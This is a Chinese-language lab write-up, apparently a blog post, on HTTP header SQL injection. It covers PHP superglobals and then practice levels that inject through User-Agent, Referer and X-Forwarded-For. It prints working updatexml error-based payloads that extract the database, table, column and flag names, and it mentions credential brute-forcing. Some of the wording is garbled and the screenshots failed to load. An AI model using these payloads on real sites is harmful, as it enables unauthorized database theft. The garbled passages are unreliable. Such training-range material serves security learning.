1.概念
头部插件:下面的情况信息与网站请求的插件就可以试用
常见的超变量:
- $ _ REQUEST(获取GET/POST/COOKIE)COOKIE在新版本已经无法获取到- $ _ POST(获取POST传参)- $ _ GET(获取GET的参)- $ _COOKIE(COOKIE的值)- $ _SERVER(包含类别信息的路径(header)、以及脚本位置)等信息的路径)
$_SERVER 常见的用法:
- $_SERVER[‘HTTP_REFERER’] 获取Refer请求用户头数据- $_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息,包括用户浏览器、操作等信息。- $_SERVER[“REMOTE_ADDR”] 浏览网页的ip。
2.靶场
1.pass-07—他注入(一)
-查看源头,发现头已经对进入特殊的特征源进行了过滤
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-IP8yTOUa-1650555601448)(https://img-blog.csdnimg.cn/img_convert/b20f1ac72e244171457b0007d421fc77.png)]
-源中头中头中的USER_AGENT与数据库有用的密码试探12个USER_AGENT入手试用-打先饱爆破,获取用户名及密码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-R2W23MHu-1650555601451)(https://img-blog.csdnimg.cn/img_convert/247b927f4093a19d6e9a744f93614a7e.png)]
-使用USER_AGENT注入获取数据库名: ’ or updatexml(1,concat(‘!’,database()),1),1) – wq - updatexml() :更新xml文档的函数
语法:updatexml(目标xml内容,xml文档路径,更新的内容)
得到数据库名head_error
- 获取表名 :’ or updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=‘head_error’ limit 0,1)),1),1) – qwe
得到表名:flag_head
- 查询字段名 : ’ or updatexml(1,concat(‘!’,(select column_name from information_schema.columns where table_name=‘flag_head’ limit 0,1)),1),1) – qwe
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mgt7s5ZS-1650555601452)( https://img-blog.csdnimg.cn/img_convert/b6bfdbedcb137d4cdcdf44a0ce9eb29c.png )]
得到两个名字:Id flag_h1
–查询表中数据:’ or updatexml(1,concat(‘!’,(select flag_h1 from flag_head limit 0,1)),1),1) — qwe
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-iH5BUbLS-1650555601453)(https://img-blog.csdnimg.cn/img_convert/dd24d560f110a277eea2a83b83820b0e.png)]
迟到
2.pass-08—他注入(二)
-查看源代码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-SEShPzQm-1650555601454)(https://img-blog.csdnimg.cn/img_convert/ff15a0a4e568d5b39e30d50299e522c3.png)]
同上一题一样,修改heads的refer进行智能测试
3.pass-09 —头部注入(三)
-查看源代码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-870mBdUi-1650555601455)(https://img-blog.csdnimg.cn/img_convert/53e0052181564cd9c1cd43fb7e46cb36.png)]
同上题一样,修改header的X_FORWARDED_FOR进行智能测试